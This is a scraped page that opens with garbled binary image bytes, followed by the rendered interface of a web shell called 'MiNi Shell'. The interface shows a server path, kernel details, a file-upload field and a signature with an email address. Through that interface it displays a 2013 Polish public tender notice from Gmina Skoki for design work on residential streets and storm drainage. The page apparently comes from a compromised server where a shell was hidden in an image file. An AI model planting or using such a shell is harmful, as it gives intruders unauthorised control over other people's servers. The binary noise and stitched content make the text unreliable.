JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130207/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130207/20187-N-2013.html

<p class="kh_header"><b>Skoki: Wykonanie dokumentacji projektowej przebudowy ulic osiedla Topolowa II w Skokach - ulica Jodłowa, Jarzębinowa i Świerkowa wraz z kanalizacja desczczową</b><br>
<b>Numer ogłoszenia: 20187 - 2013; data zamieszczenia: 07.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Skoki , ul. Ciastowicza 11, 62-085 Skoki, woj. wielkopolskie, tel. 061 8925801, faks 061 8925803.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://skoki.nowoczesnagmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej przebudowy ulic osiedla Topolowa II w Skokach - ulica Jodłowa, Jarzębinowa i Świerkowa wraz z kanalizacja desczczową.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie   dokumentacji projektowej  na przebudowę  ulic Osiedla Topolowa II w Skokach ul. Jodłowa , Jarzębinowa i Świerkowa wraz z kanalizacją deszczową.
Teren inwestycji :
Terenem objęty opracowaniem  jest   osiedle TOPOLOWA II w Skokach,  zabudowane    budynkami mieszkalnymi jednorodzinnymi. Istniejące nawierzchnie ulic są gruntowe, częściowo utwardzone kruszywem z recyklingu nie posiadające odwodnienia. W ulicach zlokalizowane jest  uzbrojenie w postaci  sieci wodociągowej, kanalizacji sanitarnej, sieci gazowej, przyłączy energetycznych i przyłączy telefonicznych. 
Szacunkowa długość dróg do  opracowania dokumentacji projektowej wynosi ok. 800m i  planowanej szerokości jezdni  od 5 do 6 m. Przedmiotowe ulice stanowią  własność Gminy Skoki  :
-ul. Świerkową  o nr działek  1494, 1498 i 1499,  
-ul. Jodłową o nr działek  1024 i 1500,  
-ul. Jarzębinową o nr działki 1501,
-ciąg pieszy z kostki betonowej długości ok. 35m i szer. 4 m stanowiący działkę nr 1504.
Włączenie nowoprojektowanych ulic nastąpi do ul. Topolowej   i Antoniewskiej w Skokach  stanowiących drogi powiatowe. Zakres opracowania  określa mapa ewidencyjna w skali1 : 2000 stanowiąca załącznik do niniejszej specyfikacji
Zakres zadania obejmuje zaprojektowanie :
-kanalizacji deszczowej do odprowadzania wód deszczowych z w w ulic  z włączeniem  do istniejącej sieci kanalizacji deszczowej w ul. Kasztanowej do studni o rzędnych 82,68 81,75 lub ul. Akacjowej o rzędnych 83,96 80,86              ( ewentualnie studnie chłonne i przepompownia wód deszczowych w przypadku braku możliwości grawitacyjnego  spływu wód do istniejącej kanalizacji deszczowej ),
-nawierzchni drogowej bitumicznej na w w ulicach ( warstwa wiążąca i ścieralna)    łącznie z podbudową  drogi, ściekami i  krawężnikami ( bez chodników ).
-nawierzchni z kostki betonowej w ciągu pieszym działka nr 1504,
 3.2. W ramach niniejszego zamówienia należy   : 

1.Przedstawić  roboczą wersję dokumentacji, ewentualne warianty-propozycje rozwiązań projektowych celem uzyskania pisemnej zgody zamawiającego.
2.Opracować materiały i uzyskać decyzje o środowiskowych uwarunkowaniach  zgody na realizację zadania wraz z wykonaniem  raportu oddziaływania na środowisko         ( jeżeli będzie wymagana),
3.Opracować materiały i uzyskać decyzje o lokalizacji inwestycji celu publicznego.  
4.Zaktualizować i opracować podkłady  syt. - wys. w skali 1:500 do celów projektowych, 
5.W ramach realizacji zamówienia wykonawca dostarczy zamawiającemu  dokumentacje projektową  zawierającą:
-Projekty budowlane  w 5 egz. 
-Projekty  wykonawcze ( w zależności od potrzeb), 
-Projekt organizacji ruchu z oznakowaniem - 3 egz,
-Specyfikacja techniczna wykonania i odbioru w/w robót 3 egz,
-Przedmiary robót 3 egz.
-Kosztorysy inwestorskie 3 egz.
-Kosztorysy ofertowe 3 egz.
6.  Płyty CD 2 sz.t z opracowaną wersją elektroniczną pełnej dokumentacji projektowo - kosztorysowej z możliwością ich odczytu  w plikach JPG lub PDF do celów   przetargowych.

3.3.  Wymagania stawiane wykonawcy:

1. Uwzględnić w opracowywanej dokumentacji  zabezpieczenie lub przebudowę  infrastruktury technicznej kolidującej  z przebudową dróg,
2. Wykonanie projektu organizacji ruchu  na czas wykonywania robót i projektu stałej organizacji ruchu, 
3. Przewidziane przez wykonawcę do zastosowania materiały  w projekcie powinny spełniać wszelkie wymogi ustawy Prawo Budowlane,
4.  W dokumentacji projektowej nie mogą występować  nazwy własne producentów i dostawców. Wskazanie w dokumentacji na znak towarowy, patent lub pochodzenie może wystąpić tylko w wyjątkowej sytuacji, tj. gdy przedmiotu zamówienia nie można opisać  za pomocą dostatecznie dokładnych określeń, a wskazaniu temu muszą  towarzyszyć wyrazy  lub równoważny . Należy wówczas określić parametry graniczne (brzegowe) na podstawie, których będzie można stwierdzić równoważność zaoferowanych  rozwiązań, technologii. Projektant zobowiązany jest do  opisania proponowanych materiałów, wyrobów i urządzeń za pomocą parametrów technicznych, tzn.  bez podawania nazw.    
5.  Projektant na bieżąco będzie informował Zamawiającego o postępie prac przekazując mu kopie wystąpień o warunki, wytyczne, uzgodnienia  i kopie otrzymanych warunków i wytycznych. 
 7. Wykonawca zabezpieczy we własnym zakresie i na własny koszt, wszystkie materiały niezbędne do realizacji przedmiotu zamówienia, w tym podkłady geodezyjne  a także wszelkie formalności administracyjne ( ewentualne pozwolenie Wielkopolskiego Wojewódzkiego Konserwatora Zabytków przed otrzymaniem pozwolenia na budowę w przypadku ustanowienia nadzoru archeologicznego nad prowadzonymi pracami ), decyzje oraz uzgodnienia  dokumentacji projektowej między innymi w ZUD, ENEA, Spółka Gazownicza  ...... .   
 
Zalecane jest, aby Wykonawca przed złożeniem oferty dokonał wizji lokalnej obejmującej teren projektowanej inwestycji.  
UWAGA: Zakres  zamówienia obejmuje również nadzór autorski nad realizacją robót zawartych w zamawianej dokumentacji projektowej (w ramach wynagrodzenia za jej opracowanie). 
 3.4 Dokumentacja powinna spełniać wymogi :
 Dokumentacje należy opracować zgodnie z wymogami ustawy z dnia 07.07.1994 r. Prawo Budowlane ( tekst jednolity z 2010 r. Dz. U. Nr 243, poz. 1623  z późniejszymi zmianami), obowiązującymi normami i aktualnymi warunkami technicznymi, wymogami Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004r.  w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego. (Dz. U. Nr 202, poz. 2072 16.09.2004r. z późniejszymi zmianami), wymogami Rozporządzenia Ministra Infrastruktury z dnia 03.07.2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego oraz wymogami innych przepisów obowiązujących w dniu przekazania Zamawiającemu.
Sieci uzbrojenia należy pokolorować w projektach zagospodarowania terenu i projektach budowlanych czytelną techniką oraz oznaczyć na kolorowo granice pasa drogowego. 

            Specyfikacje Techniczne Wykonania i Odbioru Robót - zawierające zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania dotyczące właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót oraz określające zakresy prac, które powinny być ujęte w cenach poszczególnych pozycji przedmiaru. Specyfikacje Techniczne Wykonania i Odbioru Robót należy wykonać jako oddzielne opracowania, w których należy wydzielić tomy zgodnie z przyjętą systematyką podziału robót budowlanych. Specyfikacje techniczne wykonania i odbioru robót należy opracować z uwzględnieniem podziału szczegółowego, wg Wspólnego Słownika Zamówień CPV . 

            Przedmiary robót  - zawierające zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz 
z ich szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazaniem właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych, z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót podstawowych. Spis działów przedmiaru robót powinien przedstawiać podział wszystkich robót budowlanych na grupy robót, wg Wspólnego Słownika Zamówień  CPV . Opracowane przedmiary muszą w poszczególnych pozycjach zawierać wyliczenie ilości robót. 
Przedmiary robót należy wykonać jako odrębne opracowania z podziałem na branże  dla wszystkich robót ujętych w projektach.  

	Kosztorys inwestorski opracować w oparciu o obowiązujące przepisy (Rozporządzenia Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych  w programie funkcjonalno-użytkowym).

	Projekty budowlane muszą zawierać również   informację  dotyczącą bezpieczeństwa i ochrony zdrowia zgodnie z wymogami obowiązujących przepisów (Rozporządzenie Ministra Infrastruktury z dnia 23.06.2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium przetargowego</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie    warunku  Zamawiający uzna wykonananie  dokumentacji projektowej odpowiadającej swoim rodzajem opracowaniom projektowym stanowiącym przedmiot zamówienia  wraz z dokumentem potwierdzającym, że usługi te zostały wykonane należycie tj.   opracowanie minimum jednej dokumentacji projektowej  na budowę (przebudowę ) nawierzchni drogi (bitumicznej lub z kostki betonowej )wraz z odwodnieniem kanalizacją deszczową o długości minimum 500m ( droga i kanalizacja deszczowa )o wartości dokumentacji nie mniejszej niż 30.000zł brutto</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna złożenie  wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych w zakresie wykonywanych przez nich czynności i   podstawie dysponowania tymi osobami i złożyć oświadczenie stwierdzające, iż osoby     wymienione w w w wykazie posiadają    wymagane uprawnienia tj. dysponowanie   osobami  posiadającymi uprawnienia projektowe do projektowania w specjalności   drogowej i instalacyjnej w zakresie sieci kanalizacji deszczowej w rozumieniu przepisów prawa budowlanego i przepisów wykonawczych  lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://skoki.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Skoki ul. Ciastowicza 11, 62-085 Skoki - pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2013 godzina 12:00, miejsce: Urząd Miasta i Gminy Skoki ul. Ciastowicza 11, 62-085 Skoki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com